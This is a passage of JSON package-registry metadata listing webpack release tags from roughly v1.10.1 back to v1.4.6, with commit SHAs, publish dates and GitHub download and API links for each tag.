3:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecos